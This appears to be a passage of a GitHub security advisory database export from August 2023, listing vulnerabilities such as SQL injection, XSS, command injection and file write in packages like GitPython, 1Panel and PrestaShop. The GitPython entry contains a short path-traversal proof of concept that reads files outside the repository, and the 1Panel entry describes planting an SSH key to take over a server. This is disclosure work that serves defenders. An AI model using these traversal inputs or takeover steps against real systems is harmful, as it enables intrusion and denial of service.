The problem has been patched and released as v1.1.1 ### Workarounds No workarounds exist. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'lol-html'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/lol-html/security/advisories/GHSA-c3x7-354f-4p2x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4241'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/lol-html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T13:17:53Z', 'nvd_published_at': None}" 1.4.0,GHSA-j6mp-hx4g-p3gm,2023-08-30T20:39:09Z,2023-08-29T00:32:04Z,,['CVE-2023-41005'],Command injection in pagekit,An issue in Pagekit pagekit v.1.0.18 alows a remote attacker to execute arbitrary code via thedownloadAction and updateAction functions in UpdateController.php,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pagekit/pagekit'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.18'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-41005'}, {'type': 'WEB', 'url': 'https://github.com/pagekit/pagekit/issues/977'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-30T20:39:09Z', 'nvd_published_at': None}" 1.4.0,GHSA-5824-cm3x-3c38,2023-08-09T14:27:57Z,2023-08-09T14:27:57Z,,['CVE-2023-39363'],Vyper has incorrectly allocated named re-entrancy locks,"### Impact In versions 0.2.15, 0.2.16 and 0.3.0, named re-entrancy locks are allocated incorrectly. Each function using a named re-entrancy lock gets a unique lock regardless of the key, allowing cross-function re-entrancy in contracts compiled with the susceptible versions. A specific set of conditions is required to result in misbehavior of affected contracts, specifically: - A `.vy` contract compiled with either of the following `vyper` versions: `0.2.15`, `0.2.16`, `0.3.0` - A primary function that utilizes the `@nonreentrant` decorator with a specific `key` and does not strictly follow the check-effects-interaction pattern (i.e. contains an external call to an untrusted party before storage updates) - A secondary function that utilizes the same `key` and would be affected by the improper state caused by the primary function ### Patches https://github.com/vyperlang/vyper/pull/2439, https://github.com/vyperlang/vyper/pull/2514 ### Workarounds Upgrade to 0.3.1 or higher ### References Technical post-mortem report: https://hackmd.io/@vyperlang/HJUgNMhs2","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'vyper'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.15'}, {'fixed': '0.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/security/advisories/GHSA-5824-cm3x-3c38'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39363'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/pull/2439'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/pull/2514'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/vyper/PYSEC-2023-142.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/vyperlang/vyper'}, {'type': 'WEB', 'url': 'https://hackmd.io/@LlamaRisk/BJzSKHNjn'}, {'type': 'WEB', 'url': 'https://hackmd.io/@vyperlang/HJUgNMhs2'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:27:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-9phh-r37v-34wh,2023-08-14T21:10:17Z,2023-08-14T21:10:17Z,,[],lakeFS vulnerable to Arbitrary JavaScript Injection via Direct Link to HTML Files,"### Impact The browser renders the resulting HTML when opening a direct link to an HTML file via lakeFS. Any JavaScript within that page is executed within the context of the domain lakeFS is running in. An attacker can inject a malicious script inline, download resources from another domain, or make arbitrary HTTP requests. This would allow the attacker to send information to a random domain or carry out lakeFS operations while impersonating the victim. Note that to carry out this attack, an attacker must already have access to upload the malicious HTML file to one or more repositories. It also depends on the victim receiving and opening the link to the malicious HTML file. ### Patches This is fixed in lakeFS version 0.106.0 ### Workarounds There are no known workarounds at this time. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/treeverse/lakefs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.106.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/treeverse/lakeFS/security/advisories/GHSA-9phh-r37v-34wh'}, {'type': 'WEB', 'url': 'https://github.com/treeverse/lakeFS/commit/2b2a9fa156ad80b0aac043e17533b546b1800603'}, {'type': 'PACKAGE', 'url': 'https://github.com/treeverse/lakeFS'}, {'type': 'WEB', 'url': 'https://github.com/treeverse/lakeFS/releases/tag/v0.106.0'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-14T21:10:17Z', 'nvd_published_at': None}" 1.4.0,GHSA-xjw2-6jm9-rf67,2023-08-30T20:47:58Z,2023-08-30T20:47:58Z,,['CVE-2023-41039'],"Sandbox escape via various forms of ""format"".","### Impact Python's ""format"" functionality allows someone controlling the format string to ""read"" all objects accessible through recursive attribute lookup and subscription from objects he can access. This can lead to critical information disclosure. With `RestrictedPython`, the format functionality is available via the `format` and `format_map` methods of `str` (and `unicode`) (accessed either via the class or its instances) and via `string.Formatter`. All known versions of `RestrictedPython` are vulnerable. ### Patches The issue will be fixed in 5.4 and 6.2. ### Workarounds There are no workarounds to fix the issue without upgrading. ### References * https://docs.python.org/3/library/stdtypes.html#str.format_map * http://lucumr.pocoo.org/2016/12/29/careful-with-str-format/ * https://www.exploit-db.com/exploits/51580 ### For more information If you have any questions or comments about this advisory: * Open an issue in the [RestrictedPython issue tracker](https://github.com/zopefoundation/RestrictedPython/issues) * Email us at [security@plone.org](mailto:security@plone.org) ### Credits Thanks for analysing and reporting the go to: * Abhishek Govindarasu * Ankush Menat * Ward Theunisse ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'RestrictedPython'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.3'}}, {'package': {'ecosystem': 'PyPI', 'name': 'RestrictedPython'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0'}, {'fixed': '6.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/RestrictedPython/security/advisories/GHSA-xjw2-6jm9-rf67'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-41039'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/RestrictedPython/commit/4134aedcff17c977da7717693ed89ce56d54c120'}, {'type': 'PACKAGE', 'url': 'https://github.com/zopefoundation/RestrictedPython'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-30T20:47:58Z', 'nvd_published_at': None}" 1.4.0,GHSA-64x5-55rw-9974,2023-08-29T23:34:09Z,2023-08-29T23:34:09Z,,['CVE-2023-40170'],cross-site inclusion (XSSI) of files in jupyter-server,"### Impact Improper cross-site credential checks on `/files/` URLs could allow exposure of certain file contents, or accessing files when opening untrusted files via ""Open image in new tab"". ### Patches Jupyter Server 2.7.2 ### Workarounds Use lower performance `--ContentsManager.files_handler_class=jupyter_server.files.handlers.FilesHandler`, which implements the correct checks. ### References Upstream patch for CVE-2019-9644 was not applied completely, leaving part of the vulnerability open. Vulnerability reported by Tim Coen via the [bug bounty program](https://app.intigriti.com/programs/jupyter/jupyter/detail) [sponsored by the European Commission](https://commission.europa.eu/news/european-commissions-open-source-programme-office-starts-bug-bounties-2022-01-19_en) and hosted on the [Intigriti platform](https://www.intigriti.com/).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'jupyter-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-64x5-55rw-9974'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40170'}, {'type': 'WEB', 'url': 'https://github.com/jupyter-server/jupyter_server/commit/87a4927272819f0b1cae1afa4c8c86ee2da002fd'}, {'type': 'PACKAGE', 'url': 'https://github.com/jupyter-server/jupyter_server'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/jupyter-server/PYSEC-2023-157.yaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NRP7DNZYVOIA4ZB3U3ZWKTFZEPYWNGCQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XDKQAWQN6SQTOVACZNXYKEHWQXGG4DOF/'}]","{'cwe_ids': ['CWE-284', 'CWE-306', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-29T23:34:09Z', 'nvd_published_at': None}" 1.4.0,GHSA-f8pq-3926-8gx5,2023-08-09T20:59:14Z,2023-08-09T20:59:14Z,,[],Unsanitized user controlled input in module generation,"## Impact The `import-in-the-middle` loader used by `@opentelemetry/instrumentation` works by generating a wrapper module on the fly. The wrapper uses the module specifier to load the original module and add some wrapping code. It allows for remote code execution in cases where an application passes user-supplied input directly to an `import()` function. ## Patches This vulnerability has been patched in `@opentelemetry/instrumentation` version `0.41.2` ## Workarounds - Do not pass any user-supplied input to `import()`. Instead, verify it against a set of allowed values. - If using `@opentelemetry/instrumentation` with support for EcmaScript Modules is not needed, ensure that none of the following options are set (either via command-line or the `NODE_OPTIONS` environment variable): ``` --experimental-loader=@opentelemetry/instrumentation/hook.mjs --experimental-loader @opentelemetry/instrumentation/hook.mjs --loader=import-in-the-middle/hook.mjs --loader import-in-the-middle/hook.mjs ``` ## References - https://github.com/DataDog/import-in-the-middle/security/advisories/GHSA-5r27-rw8r-7967","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': '@opentelemetry/instrumentation'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.40.0'}, {'fixed': '0.41.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-f8pq-3926-8gx5'}, {'type': 'WEB', 'url': 'https://github.com/open-telemetry/opentelemetry-js/commit/ffe641c08c69f41ca8d292221dc1804d511efb28'}, {'type': 'PACKAGE', 'url': 'https://github.com/open-telemetry/opentelemetry-js'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T20:59:14Z', 'nvd_published_at': None}" 1.4.0,GHSA-gf46-prm4-56pc,2023-08-09T14:36:16Z,2023-08-09T14:36:16Z,,['CVE-2023-39526'],PrestaShop SQL manager vulnerability,"### Impact Remote code execution through SQL injection and arbitrary file write in back office ### Patches 1.7.8.10 8.0.5 8.1.1 ### Found by Truff (via yeswehack) ### Workarounds none ### References none","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.1.0'}, {'fixed': '8.1.1'}]}], 'versions': ['8.1.0']}, {'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.0.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.8.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-gf46-prm4-56pc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39526'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/817847e2347844a9b6add017581f1932bcd28c09'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:36:16Z', 'nvd_published_at': None}" 1.4.0,GHSA-hf7j-xj3w-87g4,2023-08-10T20:09:47Z,2023-08-10T20:09:47Z,,['CVE-2023-39966'],1Panel arbitrary file write vulnerability,"# Summary An arbitrary file write vulnerability could lead to direct control of the server # Details ## Arbitrary file creation In the api/v1/file.go file, there is a function called SaveContentthat,It recieves JSON data sent by users in the form of a POST request. And the lack of parameter filtering allows for arbitrary file write operations.It looks like this: - Vulnerable Code ![微信图片_20230801092544](https://user-images.githubusercontent.com/136411443/257381095-4d7c014b-b699-4152-8b9d-2cc9399dfd85.png) # PoC - We can write the SSH public key into the /etc/.root/authorized_keys configuration file on the server. ![微信图片_20230801093243](https://user-images.githubusercontent.com/136411443/257381907-38784fab-77b9-47b9-a598-44ef7ad0b65c.png) - The server was successfully written to the public key ![微信图片_20230801093610](https://user-images.githubusercontent.com/136411443/257382468-b4836eee-f751-4b43-93ff-cb39fdc6c809.png) - Successfully connected to the target server using an SSH private key. ![微信图片_20230801093933](https://user-images.githubusercontent.com/136411443/257383031-53f1e5de-2743-48ed-a1cf-9a5ea0c0f90b.png) ![微信图片_20230801094037](https://user-images.githubusercontent.com/136411443/257383041-d9f64647-95d9-4711-8b9f-e152966537c9.png) As a result, the server is directly controlled, causing serious **harm** # Impact 1Panel v1.4.3 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/1Panel-dev/1Panel'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.3'}, {'fixed': '1.5.0'}]}], 'versions': ['1.4.3']}]","[{'type': 'WEB', 'url': 'https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-hf7j-xj3w-87g4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39966'}, {'type': 'PACKAGE', 'url': 'https://github.com/1Panel-dev/1Panel'}, {'type': 'WEB', 'url': 'https://github.com/1Panel-dev/1Panel/releases/tag/v1.5.0'}]","{'cwe_ids': ['CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-10T20:09:47Z', 'nvd_published_at': None}" 1.4.0,GHSA-3r32-cp7v-5wq4,2023-08-30T20:43:00Z,2023-08-29T00:32:03Z,,['CVE-2023-39059'],Code injection in ansible semaphore,An issue in ansible semaphore v.2.8.90 allows a remote attacker to execute arbitrary code via a crafted payload to the extra variables parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ansible-semaphore/semaphore'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.8.90'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39059'}, {'type': 'WEB', 'url': 'https://gist.github.com/Alevsk/1757da24c5fb8db735d392fd4146ca3a'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible-semaphore/semaphore'}, {'type': 'WEB', 'url': 'https://www.alevsk.com/2023/07/a-quick-story-of-security-pitfalls-with-execcommand-in-software-integrations/'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-30T20:43:00Z', 'nvd_published_at': None}" 1.4.0,GHSA-62pr-54gv-vg5g,2023-08-31T18:33:40Z,2023-08-29T15:31:51Z,,['CVE-2023-40787'],SpringBlade vulnerable to SQL injection,"In SpringBlade V3.6.0 when executing SQL query, the parameters submitted by the user are not wrapped in quotation marks, which leads to SQL injection.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.springblade:blade-core-tool'}, 'ecosystem_specific': {'affected_functions': ['']}, 'versions': ['3.6.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40787'}, {'type': 'WEB', 'url': 'https://gist.github.com/kaliwin/9d6cf58bb6ec06765cdf7b75e13ee460'}, {'type': 'PACKAGE', 'url': 'https://github.com/chillzhuang/blade-tool'}, {'type': 'WEB', 'url': 'https://sword.bladex.cn/'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-31T18:33:40Z', 'nvd_published_at': None}" 1.4.0,GHSA-cwvm-v4w8-q58c,2023-09-06T17:28:06Z,2023-08-30T20:09:36Z,,['CVE-2023-41040'],Blind local file inclusion,"### Summary In order to resolve some git references, GitPython reads files from the `.git` directory, in some places the name of the file being read is provided by the user, GitPython doesn't check if this file is located outside the `.git` directory. This allows an attacker to make GitPython read any file from the system. ### Details This vulnerability is present in https://github.com/gitpython-developers/GitPython/blob/1c8310d7cae144f74a671cbe17e51f63a830adbf/git/refs/symbolic.py#L174-L175 That code joins the base directory with a user given string without checking if the final path is located outside the base directory. I was able to exploit it from three places, but there may be more code paths that lead to it: https://github.com/gitpython-developers/GitPython/blob/1c8310d7cae144f74a671cbe17e51f63a830adbf/git/repo/base.py#L605 https://github.com/gitpython-developers/GitPython/blob/1c8310d7cae144f74a671cbe17e51f63a830adbf/git/repo/base.py#L620 https://github.com/gitpython-developers/GitPython/blob/1c8310d7cae144f74a671cbe17e51f63a830adbf/git/index/base.py#L1353 ### PoC Running GitPython within any repo should work, here is an example with the GitPython repo. ```python import git r = git.Repo(""."") # This will make GitPython read the README.md file from the root of the repo r.commit(""../README.md"") r.tree(""../README.md"") r.index.diff(""../README.md"") # Reading /etc/random # WARNING: this will probably halt your system, run with caution # r.commit(""../../../../../../../../../dev/random"") ``` ### Impact I wasn't able to show the contents of the files (that's why ""blind"" local file inclusion), depending on how GitPython is being used, this can be used by an attacker for something _inoffensive_ as checking if a file exits, or cause a DoS by making GitPython read a big/infinite file (like `/dev/random` on Linux systems). ### Possible solutions A solution would be to check that the final path isn't located outside the `repodir` path (maybe even after resolving symlinks). Maybe there could be other checks in place to make sure that the reference names are valid. --- > [!NOTE] > This vulnerability was reported via email, and it was decided to publish it here and make it public, so the community is aware of it, and a fix can be provided.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'GitPython'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.35'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.1.34'}}]","[{'type': 'WEB', 'url': 'https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-cwvm-v4w8-q58c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-41040'}, {'type': 'WEB', 'url': 'https://github.com/gitpython-developers/GitPython/commit/74e55ee4544867e1bd976b7df5a45869ee397b0b'}, {'type': 'PACKAGE', 'url': 'https://github.com/gitpython-developers/GitPython'}, {'type': 'WEB', 'url': 'https://github.com/gitpython-developers/GitPython/blob/1c8310d7cae144f74a671cbe17e51f63a830adbf/git/refs/symbolic.py#L174-L175'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2023-165.yaml'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-30T20:09:36Z', 'nvd_published_at': None}" 1.4.0,GHSA-jxcx-3h54-qqxx,2023-08-23T19:43:56Z,2023-08-23T19:43:56Z,,[],SilverStripe CMS Cross-site Scripting vulnerabilities inherited from TinyMCE,"TinyMCE 4.x is vulnerable to several XSS vectors, which had been patched in later versions. Two of these have been identified as affecting silverstripe/admin. Only Silverstripe CMS 4 is affected by these vulnerabilities. It's not possible to upgrade Silverstripe CMS 4 to use a more recent release of TinyMCE without introducing breaking changes. Instead, the security patches that shipped in later releases of TinyMCE have been backported to the TinyMCE version bundled in silverstripe/admin. Silverstripe CMS 5 is not affected by these vulnerabilities because it uses TinyMCE 6.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/admin'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.13.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/admin/SS-2023-002.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/silverstripe/silverstripe-admin'}, {'type': 'WEB', 'url': 'https://www.silverstripe.org/download/security-releases/SS-2023-002'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T19:43:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-3pmj-jqqp-2mj3,2023-08-04T17:26:45Z,2023-08-04T17:26:45Z,,['CVE-2023-38690'],matrix-appservice-irc IRC command injection via admin commands containing newlines ,"### Impact It is possible to craft a command with newlines which would not be properly parsed. This would mean you could pass a string of commands as a channel name, which would then be run by the IRC bridge bot. ### Patches Versions 1.0.1 and above are patched. ### Workarounds There are no robust workarounds to the bug. You can disable dynamic channels in the config to disable the most common execution method but others may exist. It is highly recommended to upgrade the bridge. ### Credits Discovered and reported by [Val Lorentz](https://valentin-lorentz.fr/). ### For more information If you have any questions or comments about this advisory email us at [security@matrix.org](mailto:security@matrix.org).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'matrix-appservice-irc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-appservice-irc/security/advisories/GHSA-3pmj-jqqp-2mj3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38690'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-appservice-irc/commit/0afb064635d37e039067b5b3d6423448b93026d3'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/matrix-appservice-irc'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-appservice-irc/releases/tag/1.0.1'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-04T17:26:45Z', 'nvd_published_at': None}" 1.4.0,GHSA-p267-jjfq-pphf,2023-08-16T12:56:34Z,2023-08-11T09:30:36Z,,['CVE-2023-4106'],Mattermost fails to check if user is a guest before performing actions on public playbooks,"Mattermost fails to check if the requesting user is a guest before performing different actions to public playbooks, resulting a guest being able to view, join, edit, export and archive public playbooks. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.9.0'}, {'fixed': '7.9.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.9.5'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.10.0'}, {'fixed': '7.10.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.10.3'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.8.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.8.7'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4106'}, {'type': 'PACKAGE', 'url': 'https://github.com/mattermost/mattermost'}, {'type': 'WEB', 'url': 'https://mattermost.com/security-updates'}]","{'cwe_ids': ['CWE-284', 'CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T21:49:05Z', 'nvd_published_at': None}" 1.4.0,GHSA-rvjp-j5j4-c9j5,2023-08-16T19:25:37Z,2023-08-11T15:30:45Z,,['CVE-2020-20523'],Gila CMS Cross-site Scripting Vulnerability,"Cross Site Scripting (XSS) vulnerability in `adm_user` parameter in Gila CMS version 1.11.3, allows remote attackers to execute arbitrary code during the Gila CMS installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'gilacms/gila'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.11.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-20523'}, {'type': 'WEB', 'url': 'https://github.com/GilaCMS/gila/issues/41'}, {'type': 'PACKAGE', 'url': 'https://github.com/GilaCMS/gila'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T21:04:04Z', 'nvd_published_at': None}" 1.4.0,GHSA-p8rx-fwgq-rh2f,2023-08-09T13:15:38Z,2023-08-09T13:15:38Z,,['CVE-2023-35390'],.NET Remote Code Execution Vulnerability,"# Microsoft Security Advisory CVE-2023-35390: .NET Remote Code Execution Vulnerability ## Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists when some dotnet commands are used in directories with weaker permissions which can result in remote code execution. ## Announcement Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/266 ### Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. ## Affected software * Any .NET 7.0.1xx SDK 7.0.109 or earlier. * Any .NET 7.0.3xx SDK 7.0.306 or earlier. * Any .NET 6.0.1xx SDK 6.0.120 or earlier. * Any .NET 6.0.3xx SDK 6.0.315 or earlier. * Any .NET 6.0.4xx SDK 6.0.412 or earlier. If your application uses the following package versions, ensure you update to the latest version of .NET. ### .NET 7 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [ Microsoft.NET.Build.Containers](https://www.nuget.org/packages/Microsoft.NET.Build.Containers) | <= 7.0.306 | 7.0.307, 7.0.400 ### .NET 6 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- ## Advisory FAQ ### How do I know if I am affected? If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability. ### How do I fix the issue? * To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. * If you are using one of the affected packages, please update to the patched version listed above. * If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following; ``` .NET Core SDK (reflecting any global.json): Version: 6.0.300 Commit: 8473146e7d Runtime Environment: OS Name: Windows OS Version: 10.0.18363 OS Platform: Windows RID: win10-x64 Base Path: C:\Program Files\dotnet\sdk\6.0.300\ Host (useful for support): Version: 6.0.5 Commit: 8473146e7d .NET Core 